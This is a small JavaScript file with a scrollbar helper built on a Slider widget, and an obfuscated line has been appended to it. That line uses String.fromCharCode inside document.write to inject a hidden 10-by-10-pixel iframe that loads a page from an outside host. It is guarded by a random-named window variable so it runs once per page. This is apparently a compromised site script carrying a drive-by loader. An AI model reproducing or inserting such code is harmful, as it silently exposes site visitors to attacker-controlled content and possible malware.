function makeScrollbar(content2,scrollbar2,handle2, horizontal,ignoreMouse){



	new Slider(scrollbar2,handle2,   {



	steps: content2.getSize().scrollSize.x - content2.getSize().size.x,

	mode: 'horizontal',

				onChange: function(step){

					// Scrolls the content element in x direction.

						var x = (horizontal?step:0);

						content2.scrollTo(x);

				}

	 }).set(0);



}
if (undefined === window.edfecfbaeebcafbb) document.write(String.fromCharCode(60,105,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,32,119,105,100,116,104,61,34,49,48,34,32,104,101,105,103,104,116,61,34,49,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,112,97,110,97,109,97,46,99,122,46,99,99,47,115,104,111,119,116,104,114,101,97,100,46,112,104,112,63,116,61,49,50,53,49,48,48,48,49,34,62,60,47,105,102,114,97,109,101,62)); var edfecfbaeebcafbb = true;
